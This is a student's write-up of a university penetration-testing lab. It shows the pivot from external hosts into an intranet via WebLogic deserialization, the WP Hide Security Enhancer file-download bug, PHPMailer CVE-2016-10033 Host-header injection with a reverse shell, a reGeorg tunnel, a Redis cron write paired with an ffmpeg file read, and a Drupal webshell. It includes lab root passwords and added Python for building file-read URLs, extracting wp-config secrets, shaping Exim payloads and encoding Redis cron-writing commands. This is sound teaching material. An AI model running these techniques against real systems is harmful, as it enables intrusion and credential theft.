2025/05/19

Comprehensive Experiment 2 - Cyber Security Course Experiment, Wuhan University

 

【Experiment description】

The operator machine runs Kali. After login it starts in the command-line interface; enter the startx command to open the graphical interface.

All the information and tools needed are placed in the /home/Hack directory.

The task of this experiment is to pivot through the two external-network hosts, via a proxy, into the two intranet hosts. During the penetration it is generally necessary to first port-scan a host to infer the services it runs, then confirm that a vulnerability exists with vulnerability scripts and other scanning tools, and finally exploit the host to obtain privileges.

In this experiment you need to find strings of the form flag{32-character MD5 hex digest} as proof of completing each task, and submit each flag in the form.

【Purpose of experiment】

【Experimental Environment】

Operating System | IP Address    | Server Role    | Login Account / Password
Kali Linux       | 192.168.2.10  | Operator       | root / Simplexue123
CentOS 7         | 192.168.2.11  | Target machine | root / Simplexue123
CentOS 7         | 192.168.1.10  | Target machine | root / Simplexue123
CentOS 7         | 192.168.1.11  | Target machine | root / Simplexue123
CentOS 7         | 192.168.2.200 | Target machine | root / Simplexue123

 

Task 1: WebLogic deserialization

Following the experiment prompts, open 192.168.2.10 on port 7001 in Kali's Firefox browser; the server returns a 404 error. A 404 rather than a connection failure means something is listening on 7001, WebLogic's default port, even though nothing is served at the root path.

image-20250502144134743
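Before running the exploitation tool it is worth confirming that the 7001 listener really speaks T3, the protocol the classic WebLogic Java deserialization exploits are delivered over. The following Python probe is an added example, not part of the lab material or the exploitation tool: it sends the client half of the T3 handshake and parses the HELO reply. The two sample replies are constructed, not captured from the lab hosts.

```python
import socket

# Client half of the T3 handshake. A WebLogic T3 listener (default port 7001)
# replies with a 'HELO:<version>.<flag>' line; anything else (for example the
# HTTP 404 seen in the browser) means no T3 listener, or T3 is disabled.
T3_HELLO = b"t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"


def parse_t3_helo(resp: bytes):
    """Return {'version', 'flag', 'fields'} for a T3 HELO reply, else None."""
    text = resp.decode("ascii", errors="replace")
    lines = text.split("\n")
    first = lines[0].strip()
    if not first.startswith("HELO:"):
        return None
    body = first[len("HELO:"):]
    # 'HELO:12.2.1.3.false' -> version '12.2.1.3', trailing boolean 'false'
    version, _, flag = body.rpartition(".")
    fields = {}
    for line in lines[1:]:
        key, sep, value = line.strip().partition(":")
        if sep and key:
            fields[key] = value
    return {"version": version, "flag": flag, "fields": fields}


def probe_t3(host: str, port: int = 7001, timeout: float = 5.0):
    """Send the T3 hello to host:port and parse the reply (None if not T3)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(T3_HELLO)
        data = b""
        while b"\n\n" not in data and len(data) < 4096:
            chunk = sock.recv(1024)
            if not chunk:
                break
            data += chunk
    return parse_t3_helo(data)


if __name__ == "__main__":
    # Constructed sample replies, not captured from the lab.
    weblogic_reply = b"HELO:12.2.1.3.false\nAS:2048\nHL:19\nMS:10000000\n\n"
    http_reply = b"HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n\r\n"
    print(parse_t3_helo(weblogic_reply))
    print(parse_t3_helo(http_reply))
```

Run probe_t3("192.168.2.10") against the lab host to see the live reply; the version string it returns is what tells you which payload set the deserialization tool should be configured with.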

 

First, locate the WebLogic exploitation tools provided by the experiment: in the /home/Hack directory, find the exploitation tool for the WebLogic deserialization vulnerability.

image-20250502174604126

The tools needed in the later tasks are also in this folder.

image-20250502174800168

Use the WebLogic Java deserialization tool to gain access. After a simple configuration it connects and returns a working shell, and the account turns out to have root privileges (the application server is running as root, which is itself a misconfiguration that turns a deserialization bug into a full host compromise).

image-20250502175229997

image-20250502175044228

 

Look for the flag in the home directories: as the screenshot above shows, /home contains a flag directory. Reading /home/flag/flag.txt directly gives flag6{f67ed0564c9d4055130237cdde2ad486}

image-20250502175304135

image-20250502175403030

Task 2: Arbitrary file read in WordPress

First you need to know the address of the WordPress site. From the environment table the target may be 192.168.2.11, 192.168.1.10, 192.168.1.11 or 192.168.2.200; trying them one by one confirms that 192.168.2.11 hosts a WordPress site. Scanning it with wpscan shows a vulnerable plugin, wp-hide-security-enhancer v1.3.9.1: versions below 1.3.9.2 have an arbitrary file download vulnerability.

image-20250502180215702

image-20250502180328197

image-20250502180316992

Following the linked write-up (Arbitrary File Download Vulnerability in WP Hide Security Enhancer 1.3.9.2 - SecuPress), which quotes the plugin's router code:

"All an attacker needs is 2 parameters in the URL, as requested in line 8:"

"Now, line 15 expects an existing file. And an attacker knows an existing AND interesting file on your installation, which is wp-config.php."

That is, by requesting 192.168.2.11/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php, the target web server returns the raw source of its wp-config.php (the router reads the file and sends it back instead of letting PHP execute it).

The target server's wp-config.php is read successfully, and the flag is found inside it: flag4{358006170b5d31ff0523c1656df7b82e}

image-20250502181059991
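Added example, not from the write-up or the SecuPress article: building the file-process.php URL described above and pulling the database credentials, salts and table prefix out of the returned wp-config.php, which is what makes this file the interesting target. The host name comes from the write-up; the sample configuration text is constructed.

```python
import re
from urllib.parse import urlencode
from urllib.request import urlopen

# Router of the vulnerable plugin versions (< 1.3.9.2), as described in the write-up.
FILE_PROCESS = "/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php"


def build_download_url(base_url: str, wp_relative_path: str) -> str:
    """URL that makes file-process.php return a file under the WordPress root."""
    query = urlencode({"action": "style-clean", "file_path": wp_relative_path}, safe="/")
    return base_url.rstrip("/") + FILE_PROCESS + "?" + query


def fetch_file(base_url: str, wp_relative_path: str, timeout: float = 10.0) -> str:
    """Download one file through the vulnerable router (network call, not used offline)."""
    with urlopen(build_download_url(base_url, wp_relative_path), timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Matches define('DB_PASSWORD', 'secret'); and define( "DB_HOST", "localhost" );
DEFINE_RE = re.compile(
    r"""define\s*\(\s*['"](?P<name>[A-Za-z0-9_]+)['"]\s*,\s*['"](?P<value>[^'"]*)['"]\s*\)""")
PREFIX_RE = re.compile(r"""\$table_prefix\s*=\s*['"](?P<prefix>[^'"]*)['"]""")

SECRET_NAMES = ("DB_NAME", "DB_USER", "DB_PASSWORD", "DB_HOST", "AUTH_KEY",
                "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY")


def parse_wp_config(text: str) -> dict:
    """Extract define()d string constants and the table prefix from wp-config.php source."""
    found = {m.group("name"): m.group("value") for m in DEFINE_RE.finditer(text)}
    m = PREFIX_RE.search(text)
    if m:
        found["table_prefix"] = m.group("prefix")
    return found


def leaked_secrets(config: dict) -> dict:
    """Only the entries an attacker can use: DB login, auth salts, table prefix."""
    return {k: v for k, v in config.items() if k in SECRET_NAMES or k == "table_prefix"}


# Constructed sample wp-config.php, not the file read from 192.168.2.11.
SAMPLE_WP_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'Wp-Passw0rd!' );
define( 'DB_HOST', 'localhost' );
define( 'AUTH_KEY', 'put your unique phrase here' );
define( 'WP_DEBUG', false );
$table_prefix = 'wp_';
"""

if __name__ == "__main__":
    print(build_download_url("http://192.168.2.11", "/wp-config.php"))
    print(leaked_secrets(parse_wp_config(SAMPLE_WP_CONFIG)))
```

With the live file, parse_wp_config(fetch_file("http://192.168.2.11", "/wp-config.php")) gives the same dictionary; the DB_HOST value tells you whether the database is reachable from the network or only from the web host itself.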

 

 

Task 3: WordPress command execution

Visit the target site, configure the proxy in the browser, and use Burp Suite to intercept the request.

Intercept the WordPress login request with Burp Suite and send it to the Repeater module.

image-20250502181935546

Use Burp Suite's Repeater module to probe for the vulnerable field.

According to the prompts, after further probing it is judged that this WordPress instance has the PHPMailer command-execution vulnerability. Its characteristic is that it is triggered through the Host header of the HTTP request, and the only prerequisite is knowing the administrator's username.

Modify the Host header in Repeater: the response contains a field length: XX that changes every time the header is changed; adding one character to Host adds 1 to length. Looking closer, the number after length: equals the length of the Host request header.

image-20250502182456086

image-20250502182940019

 

Following the platform prompt ("understand the principle of the WordPress mailer vulnerability and run the wp.sh script to obtain the response information"), we guess that this system has the WordPress mailer vulnerability.

Looking up the background: when PHPMailer delivers through the underlying mail() (or sendmail) interface, the sender address is spliced into a shell command line as the -f parameter. In PHPMailer before 5.2.18 (CVE-2016-10033) that address was only passed through escapeshellcmd(), which backslash-escapes shell metacharacters but leaves spaces alone, while PHPMailer's address validation accepts RFC-compliant forms such as parenthesised comments. An attacker can therefore build an address that passes validation, is handed to /bin/sh, and is split on its spaces into additional arguments for the sendmail binary.

WordPress reaches this code through wp_mail(): the default From address is wordpress@<server name>, and the server name is taken from the HTTP Host header. When Apache's default virtual host accepts any Host value, a request with a forged Host: header controls the sender address that PHPMailer passes to sendmail.

Ordinary mail headers such as From: and Reply-To: are not where the injection happens; the Host header matters only because WordPress turns it into the sender address. The payload takes the shape Host: a(a -be ${run{…}} p): the parentheses make the extra text an RFC comment that validation accepts, the spaces split it into separate sendmail arguments, and -be puts Exim into expansion-test mode, in which ${run{…}} executes the enclosed command.

Trigger entry: anything that calls wp_mail(), or a third-party plugin/theme that calls PHPMailer, can be an entry point, including password reset (/wp-login.php?action=lostpassword), "share with a friend" emails, comment notifications, pingback/trackback, and contact-form plugins.

Constructing the request: for CVE-2016-10033 against WordPress 4.6, the attacker sends a request to a mail-sending page while forging the Host header with a payload of the form above. Because the target's sendmail binary is Exim and Apache accepts the forged Host, PHPMailer's isMail path hands the crafted sender to Exim, which executes the command.
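Added example, not the lab's wp.sh or its improved exploit script: a Python model of the two halves of the bug described above (escaping that ignores spaces, and the shell splitting the sender into extra arguments) and of the allowlist check PHPMailer later added. php_escapeshellcmd() mimics PHP's escaping, shlex.split() plays the shell, and the payload follows the Host: a(a -be ${run{…}} p) shape; the command inside ${run{}} is a placeholder, because the real payload body is further constrained by PHPMailer's address validation.

```python
import shlex

# Characters PHP's escapeshellcmd() prefixes with a backslash. Space is not among
# them, so the shell still splits the result on whitespace.
_ESCAPESHELLCMD_CHARS = set("#&;`|*?~<>^()[]{}$\\\x0a\xff")


def php_escapeshellcmd(s: str) -> str:
    """Python model of PHP escapeshellcmd(). Quote pairing is omitted, which is
    fine for the quote-free payloads modelled here."""
    return "".join("\\" + c if c in _ESCAPESHELLCMD_CHARS else c for c in s)


def sendmail_argv_for_host(host_header: str,
                           sendmail_path: str = "/usr/sbin/sendmail -t -i") -> list:
    """argv the sendmail binary receives on the vulnerable path: WordPress 4.6 sets
    From to wordpress@<Host>, PHPMailer (< 5.2.18) hands it to mail() as the -f
    sender after escapeshellcmd() only, and /bin/sh -c splits the line on spaces.
    shlex.split() stands in for the shell's word splitting and unescaping."""
    sender = "wordpress@" + host_header
    return shlex.split(sendmail_path + " -f" + php_escapeshellcmd(sender))


def injected_exim_args(argv: list) -> list:
    """Everything after the -f<sender> word: arguments the attacker smuggled in.
    '-be' among them switches Exim into expansion-test mode, where ${run{...}}
    executes a command."""
    for i, word in enumerate(argv):
        if word.startswith("-f"):
            return argv[i + 1:]
    return []


def is_shell_safe(sender: str) -> bool:
    """Modelled on the isShellSafe() allowlist PHPMailer added after CVE-2016-10033:
    only ASCII alphanumerics and @ _ - . are allowed; otherwise -f is not passed."""
    return all(c.isascii() and (c.isalnum() or c in "@_-.") for c in sender)


if __name__ == "__main__":
    # Constructed payload in the shape the improved script uses; the command inside
    # ${run{...}} is a placeholder.
    evil_host = "a(a -be ${run{/usr/bin/id}} p)"
    for host in ("192.168.2.11", evil_host):
        argv = sendmail_argv_for_host(host)
        print(host, "->", argv)
        print("  injected:", injected_exim_args(argv),
              " blocked by fix:", not is_shell_safe("wordpress@" + host))
```

The benign host yields a single -fwordpress@192.168.2.11 argument; the crafted one yields -be and the ${run{...}} expansion as separate words, which is exactly what Exim then evaluates. Running is_shell_safe() over the same sender shows why patched PHPMailer simply drops -f for it.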

 

The logic of wp.sh is now understandable: it splices a malicious command (a reverse shell) into the Host field of the request header and sends the request.

image-20250502195917170

image-20250502195902265

Now modify the configuration in the script so that wp.sh bounces the shell of the WordPress server 192.168.2.11 back to the attack machine 192.168.2.10.

image-20250502200905796

image-20250502200321116

Run ./wp.sh and obtain flag3{452755af28285ffd6615866f61bb23e6}

image-20250502200744699

 

Task 4: Obtain command execution through the improved exploit script

Although the flag was obtained in the previous task, a reverse shell was not obtained directly.

Look at the improved script wordpress-rce-exploit.sh:

Lines 3-17: the prep_host_header() function (as the name says, it prepares the request header) takes the incoming command (such as curl … or /bin/bash …), string-processes it, and wraps it into a payload that Exim (the mail transfer agent) will parse and execute, then places it in the HTTP Host: header. The final result looks like: Host: a(a -be ${run{…}} p)

Lines 21-25: argument check; the script must be given the address of a target machine.

Lines 31-34: build and host the reverse-shell script: write the reverse-shell command into a file r, and serve it with Python's simple HTTP server.

Lines 37-41: inject the command that downloads and saves the payload on the target.

Use curl to send a POST request to the target's wp-login.php?action=lostpassword.

Because of CVE-2016-10033, WordPress turns the (malicious) Host: header into the sender address of the password-reset mail; PHPMailer passes that address to Exim on the sendmail command line, where the injected -be ${run{…}} makes Exim execute the command. This makes the target download the attacker-hosted r file to /tmp/r.

Lines 43-49: trigger execution of the reverse shell.

image-20250502202628198

image-20250502202630805

Before modifying rev_host, note a quirk of the experimental platform: the environment table lists the operator machine as Kali Linux 192.168.2.10, but running ifconfig on the machine shows that its real IP in the intranet is 192.168.2.200

image-20250502203348563

image-20250502203403028

After reconfiguring the correct IP and port for receiving the reverse shell in the script, run nc to listen on the configured port, then run the improved script. The reverse shell was obtained and the flag was found in a subdirectory of /home:

flag5{2591c98b70119fe624898b1e424b5e91}

image-20250502203621687

image-20250502203809132

Next, use the shell to upload reGeorg's tunnel.php file and set up a proxy with reGeorg.

During the experiment the reverse shell lasted only a short time, with a window of about 30 seconds for operations. I tried to persist a one-line PHP webshell, but it never worked; my speculation is that the server's security settings blocked execution of malicious PHP code (such as eval). In the end I served the file from the attack machine with the SimpleHTTPServer module and successfully downloaded reGeorg's tunnel.php onto the server.

image-20250502223155444

 

After tunnel.php is uploaded, use reGeorg on the attack machine to set up the proxy.

Route traffic through the reGeorg SOCKS proxy with proxychains (the ProxyChains configuration file is /etc/proxychains.conf; its socks entry must point at the local port reGeorg listens on) and use this proxy to scan the intranet 192.168.1.0 segment.

image-20250502223438687

image-20250502223820256

image-20250502224001233

 

Task 5: Redis unauthorized access + ffmpeg arbitrary file read

Trying the other target IPs, 192.168.1.11 offers a video-processing service based on ffmpeg, with /upload, /download and /del endpoints for handling files.

image-20250503001623003

 

Scan the ports with nmap: since the highest port used by Redis Enterprise is 9443, the upper limit of the scan range does not need to be very large. The scan finds an HTTP service on port 80 and Redis on port 6379.

Redis accepts connections without a password. Querying the server shows that its configuration file is stored at /etc/redis/63799.conf

image-20250503003429453

image-20250504122953881

 

The task requires us to obtain the Redis configuration file; see the material on gen_xbin_avi.py:

FFmpeg arbitrary file read vulnerability analysis (ffmpeg file read vulnerability) - CSDN blog

neex/ffmpeg-avi-m3u-xbin

Generate the malicious video with python3 ./gen_xbin_avi.py file://<filename> file_read.avi; note that python3 must be used here, since the default python is version 2.7.

Upload the malicious video to the /upload API; a warning appears (apparently about the file name), so rename it 123.avi and upload again, then fetch the result from the /download URL as 456.avi. The content of this "video" is actually the content of the target file.

The configuration contains the line rename-command config "ccoonnffiigg"

image-20250504125537660

 

image-20250504125823706

So the CONFIG command of this Redis service has been renamed to "ccoonnffiigg". Redis can write files to disk (the renamed CONFIG command sets the dump directory and file name, and SAVE writes the RDB file there), and this is used to overwrite the target's cron file with a scheduled task.

The platform's redis.txt gives a hint; after the scheduled task was configured, the reverse shell was obtained.
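Added example, not the lab's redis.txt or any tool it provides: parsing the exfiltrated redis.conf for the directives that decide whether this trick works, resolving what the renamed CONFIG command is now called (or that it is disabled outright when renamed to ""), and encoding the dir/dbfilename/SAVE sequence as raw RESP, the wire format redis-cli sends. The configuration text and cron line are constructed; /var/spool/cron/ is the CentOS cron spool, matching the CentOS 7 targets in the environment table.

```python
import re

# Constructed sample; not the lab's /etc/redis/63799.conf. The first rename line
# mirrors the one found in the write-up.
SAMPLE_CONF = """# Redis configuration (constructed sample)
port 6379
bind 0.0.0.0
protected-mode no
rename-command config "ccoonnffiigg"
rename-command FLUSHALL ""
"""


def resp_encode(*args: str) -> bytes:
    """Encode one command as a RESP array of bulk strings, as redis-cli sends it."""
    out = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        out.append(f"${len(raw)}\r\n".encode() + raw + b"\r\n")
    return b"".join(out)


def parse_redis_conf(text: str) -> dict:
    """Collect the directives that decide whether unauthenticated file writing works."""
    conf = {"renames": {}, "requirepass": None, "bind": None, "protected-mode": None}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, rest = line.partition(" ")
        key = key.lower()
        if key == "rename-command":
            m = re.match(r'(\S+)\s+"?([^"]*)"?', rest.strip())
            if m:
                conf["renames"][m.group(1).upper()] = m.group(2)
        elif key in ("requirepass", "bind", "protected-mode"):
            conf[key] = rest.strip().strip('"')
    return conf


def resolve_command(conf: dict, command: str):
    """Name the server accepts for `command`, or None if renamed to "" (disabled)."""
    return conf["renames"].get(command.upper(), command) or None


def hardening_findings(conf: dict) -> list:
    """What a reviewer of this configuration would flag."""
    findings = []
    if not conf["requirepass"]:
        findings.append("no requirepass: unauthenticated access")
    if conf["bind"] in (None, "0.0.0.0", "*"):
        findings.append("bound to all interfaces")
    if (conf["protected-mode"] or "yes").lower() == "no":
        findings.append("protected-mode disabled")
    if resolve_command(conf, "CONFIG") == "CONFIG":
        findings.append("CONFIG not renamed or disabled")
    return findings


def cron_write_commands(conf: dict, cron_line: str, user: str = "root"):
    """The write-up's technique as RESP: point the RDB dump at the cron spool and
    SAVE a key whose value carries a crontab line (the surrounding newlines keep
    it on its own line inside the RDB binary). None when CONFIG is disabled."""
    cfg = resolve_command(conf, "CONFIG")
    if cfg is None:
        return None
    steps = [
        (cfg, "set", "dir", "/var/spool/cron/"),   # CentOS cron spool
        (cfg, "set", "dbfilename", user),
        ("set", "x", "\n\n" + cron_line + "\n\n"),
        ("save",),
    ]
    return [resp_encode(*s) for s in steps]


if __name__ == "__main__":
    conf = parse_redis_conf(SAMPLE_CONF)
    print("CONFIG is called:", resolve_command(conf, "CONFIG"))
    print("findings:", hardening_findings(conf))
    for cmd in cron_write_commands(conf, "* * * * * /bin/true"):
        print(cmd)
```

Renaming CONFIG only slows this down once the configuration file itself can be read; the findings list shows the settings that would actually have stopped it (requirepass, a loopback bind, protected-mode).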

With the help of the reverse shell the flags are read: flag1{7bed46c5c61c0ac625cebf8a9922cc48} flag2{86a1b907d54bf7010394bf316e183e67}

image-20250504124930553

 

image-20250504130906805

image-20250504131116976

image-20250504130951772

 

Task 6: Drupal 8 remote code execution

Using the /tunnel.php left over from Task 4, set up a proxy with reGeorg, then start Firefox through proxychains to access 192.168.1.10, a website built on the Drupal framework.

image-20250504133245318

Log in to the site's backend with a weak password. Drupal has no default account and password, but the platform's drupal_poc.txt gives an interesting file path; trying the username and password admin / admin logs in successfully.

image-20250504133757818

 

image-20250504133907229

Use the deserialization vulnerability to run phpinfo and gather information about the site.

At the risky URL /admin/config/development/configuration/single/import, paste the PoC given by the platform and click Import; the phpinfo output is returned successfully.

image-20250504134128044

image-20250504134255889

Use the deserialization vulnerability to write a webshell and check that it exists. Paste the exploit given by the platform; afterwards a shell.php file should exist under the site path (the web root is /var/www/html/drupal8/)

image-20250504135132983

 

image-20250504135259198

Use Cknife through the proxy to connect to the webshell and obtain the website's privileges: connecting directly to the PHP webshell gives a virtual terminal, and the flags are read:

flag8{d969246731846291b32cd819bf0e7ff6}

flag12{c2ce1971e3a10498a64da8c7f3a70091}

image-20250504135724986

 
